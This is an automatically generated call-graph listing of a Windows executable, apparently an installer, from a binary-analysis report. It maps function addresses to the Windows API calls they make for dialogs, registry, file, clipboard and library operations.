4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 